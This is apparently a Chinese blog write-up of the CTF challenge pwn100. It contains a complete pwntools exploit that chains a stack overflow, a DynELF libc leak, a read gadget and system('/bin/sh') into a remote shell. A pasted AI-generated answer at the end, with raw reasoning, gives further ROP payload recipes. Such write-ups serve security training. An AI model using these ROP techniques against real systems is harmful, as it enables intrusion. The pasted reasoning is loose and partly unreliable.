CTF-PWN-pwn100 (ROP+DynELF定位system函数)

最新推荐文章于 2025-09-15 20:53:55 发布
原创 最新推荐文章于 2025-09-15 20:53:55 发布 · 840 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

本文分析了一个存在栈溢出的程序,并详细解释了如何利用此漏洞。通过DynELF模块泄露system地址,利用read函数将/bin/sh写入数据段,构造ROP链劫持程序流程,最终实现远程代码执行。

漏洞分析

程序中只开了NX,查看程序逻辑发现:

int sub_40068E()
{
  char buf; // [rsp+0h] [rbp-40h]

  sub_40063D((__int64)&buf, 200);
  return puts("bye~");
}

使用sub_40063D函数向buf中读取200个字符,显然存在栈溢出。接下来我们要思考如何利用这个漏洞。
观察到程序中调用read以及puts函数,而不存在system/bin/sh,我们可以考虑用DynELF模块泄露system的地址,然后用read函数将/bin/sh写入数据段,再通过构造ROP链劫持程序流程

用指令

readelf -S pwn100

查看段信息,将/bin/sh写入.data地址
至于如何调用read函数,在程序的init函数中有这样一段代码:

.text:0000000000400740 loc_400740:                             ; CODE XREF: init+54↓j
.text:0000000000400740                 mov     rdx, r13
.text:0000000000400743                 mov     rsi, r14
.text:0000000000400746                 mov     edi, r15d
.text:0000000000400749                 call    qword ptr [r12+rbx*8]
.text:000000000040074D                 add     rbx, 1
.text:0000000000400751                 cmp     rbx, rbp
.text:0000000000400754                 jnz     short loc_400740
.text:0000000000400756
.text:0000000000400756 loc_400756:                             ; CODE XREF: init+36↑j
.text:0000000000400756                 add     rsp, 8
.text:000000000040075A                 pop     rbx
.text:000000000040075B                 pop     rbp
.text:000000000040075C                 pop     r12
.text:000000000040075E                 pop     r13
.text:0000000000400760                 pop     r14
.text:0000000000400762                 pop     r15
.text:0000000000400764                 retn

可以看到,0x40075A的一串pop指令是对程序寄存器的修改,然后0x400740以后的指令是执行r12+rbx*8地址处的函数

exp:

from pwn import *

#p=process("./pwn")
p=remote("111.198.29.45",52106)
elf=ELF("./pwn")

pop_rdi=0x400763
pop_6r=0x40075A
mov_addr=0x400740
start_addr=0x400550
puts_plt=elf.plt['puts']
read_got=elf.got['read']
binsh_addr=0x601000

def leak(addr):
    payload='a'*0x48+p64(pop_rdi)+p64(addr)+p64(puts_plt)+p64(start_addr)
    payload=payload.ljust(200,"a")
    p.send(payload)
    p.recvuntil("bye~\n")
    up=""
    content=""
    cnt=0
    while True:
	c=p.recv(numb=1,timeout=0.5)
	cnt+=1
	if up=='\n' and c=="":
	    content=content[:-1]+'\x00'
	    break
	else :
	    content+=c
	    up=c
    content=content[:4]
    log.info("%#x => %s" % (addr, (content or '').encode('hex')))
    return content

d=DynELF(leak,elf=elf)
sys_addr=d.lookup('system','libc')
log.info("system_addr => %#x",sys_addr)
payload='a'*0x48+p64(pop_6r)+p64(0)+p64(1)+p64(read_got)+p64(8)+p64(binsh_addr)+p64(1)
payload+=p64(mov_addr)+'\x00'*56+p64(start_addr)
payload=payload.ljust(200,'a')
p.send(payload)
p.recvuntil("bye~\n")
p.send("/bin/sh\x00")
payload='a'*0x48+p64(pop_rdi)+p64(binsh_addr)+p64(sys_addr)
payload=payload.ljust(200,'a')
p.send(payload)
p.interactive()
攻防世界 pwn--pwn-100
YANG12345_6的博客
11-28 3572
一、checksec一下 开启了NX 二、 file一下,查看文件属性 64位文件 三、执行 让用户不断输入 四、拖进ida里分析看反汇编代码 主要代码: 数组v1的大小是0x40,后面利用的read函数的size是0xC8,有栈溢出漏洞 五、在ida里没有找到可以利用的system("bin/sh)system("cat flag") 六、原程序中没有调用system函数,在GOT和PLT中没有随system函数的记录,只能从libc中寻找system函数 有puts和read函数,可以利用
ROPCTF-pwn 详解writeup;one_gadget使用;静态库;静态链接
CHERRY_cong的博客
05-01 1539
ropme_writeup 文章目录ropme_writeup任务描述检查保护观察栈溢出地址实现系统调用ROPgadget任务一思路open(file,O_RDWR)read(4,addr,32)write(1,addr,32)exp1.py任务一运行截图任务二思路exp2.py任务二运行截图 任务描述 本实验提供了一个带有漏洞的二进制程序ropme),这个二进制程序将你提供的文件名作为参数传入以后就会发生一个栈缓冲区溢出。请使用ROP方法编写利用,在不需要额外操作标准输入的情况下,完成以下至少一项任务
(攻防世界)(2016 L-CTF)pwn100
PLpa的博客
07-12 2606
这题也是一个DynELF()的栈溢出题,不过这里是运用了puts函数而不是write函数,所以我们构造的leak函数就要不同些。 拿到题目,我们首先查看一下保护: 可以看到,程序只开启了NX保护。 我们进入IDA看一下程序逻辑,找一找漏洞: 我们找到了puts和read函数,看到了明显的栈溢出漏洞,一般思路就是DynELF函数的利用了: 我们找到我们需要的一些地址,然后开始构造exp: #!...
pwn100
pppp974的博客
07-18 344
这是一道64位的题,用rop来最终解决 exp如下: #coding:utf-8 from pwn import * from LibcSearcher import * io=remote('111.198.29.45',5) readn = 0x40063D start = 0x40068E read_got = 0x601028 put_plt = 0x400500 put_got = ...
pwnpwn-100
醉等佳人归
09-06 537
1.题目 1.1.保护机制 没开canary和ASLR,只开了NX 1.2.关键代码 2.思路 很明显就是一个简单栈溢出漏洞,但是发现没有提供lib文件,导致我们不能直接去泄漏puts加载地址然后计算偏移得到system的地址,pwn库提供了一个通过泄漏地址遍历lib库 d = DynELF(leak,elf=elf) system_addr = d.lookup('system','libc') leak参数是一个函数函数参数为地址,地址由DynELF提供,函数功能就是通过参数地址泄漏出该地址指
XCTF pwn-100
zwb2603096342的博客
05-21 749
XCTF pwn-100 典型的64位ret2libc
精选资源
0ctf-2017-pwn-char
02-05
2017年0ctfpwn题,题目质量还是非常高的,要求做题人需要扎实的shellcode编写能力和ROP链构造能力,下面给出wp链接:https://blog.youkuaiyun.com/A951860555/article/details/113666423
CTF-PWN-buuctf-not_the_same_3dsctf_2016-ROP函数返回到指定位置和ROP-chain的典型使用
serfend's blog
04-20 1639
CTF-PWN 来源:https://buuoj.cn/challenges 内容: 附件:链接:https://pan.baidu.com/s/1Wll80yDkRvz5XMW_xIZRNQ?pwd=uye9 提取码:uye9 答案:flag{c264d02e-6de6-4164-82a6-bdcb6c8ba64f} 总体思路 发现题目存在溢出点,并且给了flag相关的函数 但是此题是静态编译的,有很多其他不必要的函数,可以尝试直接使用ROP-chain方法get-shell 详细步骤 查看文件信
N1ctf-2025-PWN-ez_heap&近队容器的礼仪
weixin_52111404的博客
09-15 827
保护全开。
CTF-pwn pwntools用法探索
CoLin的pwn小屋
04-29 3388
pwntools的正确使用姿势
简单的练手栈溢出题 pwn100-附件资源
03-02
简单的练手栈溢出题 pwn100-附件资源
攻防世界 Pwn pwn-100
MrTreebook的博客
12-12 735
攻防世界 Pwn pwn-1001.题目下载地址2.checksec3.IDA分析4.exp 1.题目下载地址 点击下载 2.checksec 64位程序,目前还什么都看不出看来,直接拉近IDA看看 3.IDA分析 整个程序由3个嵌套的程序组成 我们可以看到sub_40063D是主要的程序,接受单个字符并存储到传入的参数a1所指向的空间之内 同时分析sub_40068E发现sub_40063D中a1就是sub_40068E中的v1 并且v1的栈空间大小就只有0x40,而sub_4006
攻防世界 pwn-100
weixin_56777139的博客
03-20 492
此处有一处值得一提,发送payload时注意sendline和send,sendline会自动在200个字符后加’\n’,缓冲区内则为200个字符加’\n’的形式,当复制200个字符串后返回主函数地址,缓冲区内还有’\n’,而主函数没有刷新缓冲区,所以返回主函数后进入下一轮的复制函数会将缓冲区头部的’\n’复制到内存中。构造新的payload,注意上述说的sendline和send对于此处的影响,若之前处用的sendline,那此处b’a’数量为0x48-1=0x47即可。此时即可接收泄露的内容。
[攻防世界 pwn]——pwn-100
Y_peak的博客
02-21 414
[攻防世界 pwn]——pwn-100 题目地址: https://adworld.xctf.org.cn/ 题目: checksec一下 IDA中 sub_40063D函数的作用就是读入200个字符, 不然不退出循环 思路 leek出来一个地址, 然后找到libc, 计算偏移找到system 和 ‘/bin/sh’ 循环调用, 得到shell from pwn import * from LibcSearcher import * #p = process("./pwn") p = remo
pwn-100(xctf)
weixin_43868725的博客
05-24 493
0x0 程序保护和流程 保护: 流程: main() sub_40068E() sub_40063D() 通过程序流程我们可以看出在sub_40068E()调用sub_40063D()时发生了栈溢出。 0x1 利用过程 1.这个程序没有system()函数,也没有"/bin/sh"。但是我们程序运行的时候需要libc。而libc中有我们需要的system(),所以我们只需要确定libc的基地址就可以知道system()。这里给出两种方法获取libc的基地址。第一种是pwntools自带的DynELF
攻防世界-pwn pwn-100(ROP)
菜的只能随便写写博客
11-05 3167
此题是LCTF 2016年的pwn100 参考文章:https://bbs.ichunqiu.com/forum.php?mod=viewthread&tid=42933&ctid=157 0x01 文件分析 64位elf 无stack 无PIE   0x02 运行分析  看起来像一个无限循环,不断接收输入。   0x03 静态分析 main: sub_40068E: ...
攻防世界(Pwn) PWN100
半岛铁盒的博客
03-23 323
同时这里还存在一个 v1溢出点 我们知道x86都是靠栈来传递参数的而x64换了它顺序是rdi, rsi, rdx, rcx, r8, r9,如果多于6个参数才会用栈我们要先知道这个特性 这题,里面既没有现成的system也没有/bin/sh字符串,也没有提供libc.so给我们,那么我们要做的就是想办法泄露libc地址,拿到system函数和/bin/sh字符串,这题呢,我们可以利用put来泄露read函数的地址,然后再利用LibcSearcher查询可能的libc 这题ROP,我们先构造paylo
xctf高手进阶题之pwn-100
neuisf的博客
01-25 737
此题重点为DynELF函数的使用。在函数 sub_40068E()中声明了一个大小为0x40的缓冲区,然后通过函数sub_40063D((__int64)&v1, 0xC8u);读取标准输入内容到该缓冲区,读入的长度为0xC8,大于缓冲区大小0x40,存在溢出漏洞。可以通过溢出后覆盖函数的返回地址:1.输出got函数地址;2.向可写段地址写入字符串"/bin/sh"。 ...
ctf-pwn怎么用write+read求libc的基址
最新发布
11-15
<think> 我们参考引用内容,特别是引用[1]到[5],来回答用户关于使用write和read函数CTF Pwn中求libc基址的方法。 根据引用[4]和[5],我们知道: 1. 程序运行后,libc中的函数在内存中的实际地址 = libc基址 + 函数在libc中的偏移量。 2. 我们可以通过泄露一个已经执行过的函数的实际地址(例如write或puts)来计算libc基址。 在CTF Pwn中,如果程序有栈溢出漏洞,我们可以构造ROP链来调用write函数(或puts函数)来泄露某个函数的真实地址(通常是GOT中存储的地址),然后通过这个地址减去该函数在libc中的偏移量,得到libc基址。 具体到使用write+read的方法,通常步骤如下: 步骤1:第一次溢出,利用ROP调用write函数,将GOT中某个函数(如write自身或puts)的地址输出到标准输出(文件描述符1)。同时,为了后续继续利用,我们需要控制程序返回到一个可以再次触发溢出的位置(如main函数开头)。 步骤2:接收程序输出,解析出泄露的函数地址。 步骤3:根据泄露的函数地址,计算libc基址(基址 = 泄露的函数地址 -函数在libc中的偏移量)。注意,不同libc版本中函数的偏移量不同,因此需要确定libc版本(可以通过泄露多个函数地址来匹配,或者题目提供了libc文件)。 步骤4:根据libc基址,计算出system函数和字符串"/bin/sh"的地址。 步骤5:第二次溢出,利用ROP调用read函数(或其他输入函数)将构造好的ROP链(调用system("/bin/sh"))写入到某个可写内存区域(如.bss段),然后跳转到该区域执行;或者直接构造ROP链调用system("/bin/sh")。 但是,用户特别提到使用write+read,所以这里重点在于利用write泄露地址和利用read再次读入数据。 以下是一个典型利用场景的伪代码: 第一次ROP链: - 覆盖返回地址为write函数PLT地址(write@plt- 设置write函数的参数:文件描述符(1)、要泄露的地址(如write_got,即GOT中write的地址)、输出的长度(4或8字节,取决于32位还是64位) - 设置返回地址为main函数的地址(或另一个可以再次触发溢出的地址),这样在write执行完后程序会重新运行到有漏洞的地方。 接收程序输出的write_got的值,然后计算libc基址。 第二次ROP链: - 覆盖返回地址为read函数PLT地址(read@plt- 设置read函数的参数:文件描述符(0,即标准输入)、存储地址(如.bss段的一个缓冲区)、长度(足够长以容纳我们输入的ROP链) - 设置返回地址为存储的ROP链的起始地址(即.bss段的那个缓冲区),这样read函数读入的数据(即我们构造的ROP链)会从.bss段开始执行。 第二次ROP链中,我们可以在.bss段写入一个ROP链,这个ROP链调用system("/bin/sh")。或者,我们可以利用read函数读入一个ROP链直接调用system("/bin/sh"),但要注意此时需要知道system函数的地址。 另一种常见的做法是:第二次ROP链直接构造调用system("/bin/sh"),而不通过read再次读入。但这里用户要求使用read,所以我们需要用read来读入后续的ROP链或字符串。 具体构造示例(32位): 第一次ROP链: - 填充缓冲区 - write@plt - main_addr (返回地址) - 1 (文件描述符) - write_got (要泄露的地址) - 4 (输出长度) 接收4个字节的write_got地址,计算libc基址:libc_base = write_addr - libc_write_offset 然后计算system地址和/bin/sh地址: system_addr = libc_base + libc_system_offset binsh_addr = libc_base + libc_binsh_offset 第二次ROP链: - 填充缓冲区 - read@plt - system_addr (注意:这里我们希望read后返回到system,并且参数是/bin/sh,但需要调整栈) - 0 (文件描述符) - binsh_addr (读入地址?这里需要调整思路) 实际上,我们通常需要将"/bin/sh"字符串写入内存,如果libc中已经有这个字符串,我们可以直接使用。然后调用system函数。 但是,如果我们使用read读入,我们可以这样: 第二次ROP链1(使用read读入字符串和后续ROP): read(0, bss_addr, len(payload)) # 读入payload到bss_addr 然后返回到bss_addr(即执行我们读入的shellcode或ROP链) 但是,我们也可以直接构造ROP链调用system,此时需要将"/bin/sh"的地址作为参数。我们可以将"/bin/sh"字符串读入到已知地址(如.bss段),然后调用system。 因此,第二次ROP链可以这样: - 覆盖返回地址为read@plt - 设置返回地址为pop指令的地址(用于清理read的参数),然后接着是system的地址和参数 - 参数1:0(标准输入) - 参数2:bss_addr(.bss段的一个地址,用于存放我们输入的字符串"/bin/sh") - 参数3:8(长度,足够存放字符串) - 然后设置返回地址为一段gadget:pop ebx; ret; 这样当read执行完后,会弹出参数(清理栈),然后执行下一条指令。接着我们调用system,参数是bss_addr。 具体构造(32位): payload2 = padding + read_plt + pop3_ret + 0 + bss_addr + 8 + system_addr + ret_addr + bss_addr 解释: - 调用read(0, bss_addr, 8)读入8个字节到bss_addr(这里我们输入"/bin/sh\x00") - read函数返回后,执行pop3_ret(一个弹出3个参数的gadget),将read的参数弹出栈,然后返回到system_addr - system_addr的返回地址是ret_addr(可以是一个无用的ret指令地址),参数是bss_addr(即我们读入的字符串地址) 但是,在64位系统中,参数传递通过寄存器,所以构造方式不同。 由于用户没有指定是32位还是64位,这里我们以32位为例。 然而,在实际题目中,我们往往需要根据题目提供的libc来确定偏移量,或者使用LibcSearcher等工具来查找。 总结步骤: 1. 利用write泄露一个GOT地址(如write_got)。 2. 计算libc基址(需要知道该函数在libc中的偏移)。 3. 计算system和/bin/sh的地址(需要知道它们在libc中的偏移)。 4. 利用read函数读入字符串"/bin/sh"到.bss段(可选,如果libc中已有则不用读入)。 5. 构造ROP链调用system("/bin/sh")。 注意:如果题目中write函数不可用,也可以用puts函数,但puts遇到'\0'会结束,所以需要小心。 引用[5]中提到了使用LibcSearcher来查找libc版本和偏移,我们可以使用类似的工具。 下面是一个简化的例子(假设是32位程序): 第一次ROP链: payload1 = 'A'*offset + p32(write_plt) + p32(main_addr) + p32(1) + p32(write_got) + p32(4) 然后,接收泄露的write_got地址(4字节),解析为地址。 然后,计算libc_base = write_addr - libc.symbols['write'] # 这里需要知道libc版本,或者使用LibcSearcher 接着,计算system_addr = libc_base + libc.symbols['system'] binsh_addr = libc_base + next(libc.search('/bin/sh')) # 或者如果libc中没有,则需要读入 第二次ROP链: # 首先,我们需要读入"/bin/sh"字符串到.bss段(假设bss_addr已知) payload2 = 'A'*offset payload2 += p32(read_plt) # 调用read payload2 += p32(pop3_ret) # read返回后跳到这里,弹出3个参数 payload2 += p32(0) # fd=0 payload2 += p32(bss_addr) # buf payload2 += p32(8) # len # 然后,我们调用system,参数是bss_addr payload2 += p32(system_addr) payload2 += p32(0) # system的返回地址,可以随意 payload2 += p32(bss_addr) 然后发送payload2,接着发送字符串"/bin/sh\x00"(8字节)。 这样,程序就会执行system("/bin/sh")。 但是,如果libc中已经有"/bin/sh"字符串,我们可以直接使用,不需要读入。那么第二次ROP链可以简化为: payload2 = 'A'*offset + p32(system_addr) + p32(0) + p32(binsh_addr) 然而,用户要求使用read,所以这里我们展示的是需要读入字符串的情况。 注意:实际题目中,我们可能还需要考虑栈平衡等问题。 以上是使用write+read求libc基址并最终获取shell的方法。 现在,我们根据用户要求生成相关问题。 §§相关问题§§ 1. 在32位和64位系统中,利用write和read函数求libc基址的主要区别是什么? 2. 如果程序中没有write函数,还可以用哪些函数来泄露libc基址? 3. 在利用read函数读入数据时,如何确定.bss段的地址? 4. 如何解决不同libc版本中函数偏移量不同的问题? 5. 在构造ROP链时,为什么有时候需要返回到main函数重新开始? </think>### CTF Pwn中使用write+read求libc基址的方法 在CTF Pwn中,通过`write`和`read`函数泄露libc基址是常见的利用技术,主要流程如下: #### 核心原理 1. **libc地址计算** libc基址 = 泄露的函数实际地址 -函数在libc中的固定偏移量 即:$libc\_base = leaked\_addr - offset$ 2. **GOT/PLT机制** GOT存储函数真实地址,通过泄露GOT项获取libc函数地址(如`write@got`)[^2][^5]。 #### 操作步骤 1. **第一次ROP链(泄露地址)** ```python payload1 = b'A' * offset # 填充缓冲区 payload1 += p64(pop_rdi) # 设置rdi=1 (stdout) payload1 += p64(1) payload1 += p64(pop_rsi) # 设置rsi=write_got payload1 += p64(elf.got['write']) payload1 += p64(pop_rdx) # 设置rdx=8 (64位地址长度) payload1 += p64(8) payload1 += p64(elf.plt['write']) # 调用write(1, write_got, 8) payload1 += p64(main_addr) # 返回main重新触发溢出 ``` - 执行后接收输出的8字节数据,解析为`write`函数的实际内存地址[^5]。 2. **计算libc基址** ```python write_addr = u64(io.recv(8)) # 解析泄露的地址 libc_base = write_addr - libc.sym['write'] # 计算基址 system_addr = libc_base + libc.sym['system'] binsh_addr = libc_base + next(libc.search(b'/bin/sh')) ``` 3. **第二次ROP链(getshell)** ```python payload2 = b'A' * offset payload2 += p64(pop_rdi) payload2 += p64(binsh_addr) # rdi="/bin/sh" payload2 += p64(ret) # 栈对齐(可选) payload2 += p64(system_addr) # 调用system("/bin/sh") ``` #### 关键点说明 1. **`read`函数的作用** - 在限制输入长度的题目中(如[^3]),用`read`构造栈迁移: ```python payload += p64(pop_rdi) + p64(0) # fd=0 (stdin) payload += p64(pop_rsi) + p64(new_stack) # 目标栈地址 payload += p64(elf.plt['read']) # read(0, new_stack, size) payload += p64(migrate_gadget) # 跳转到新栈 ``` - 将后续ROP链读到可控内存区域(如.bss段)[^3]。 2. **动态偏移处理** - 当libc版本未知时,用`LibcSearcher`匹配: ```python from LibcSearcher import * libc = LibcSearcher('write', write_addr) libc_base = write_addr - libc.dump('write') ``` #### 典型应用场景 1. 存在栈溢出但无`system`/`/bin/sh`的程序 2. 开启NX保护时(无法执行shellcode) 3. 输入长度受限需结合栈迁移(如[^3]) ---
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值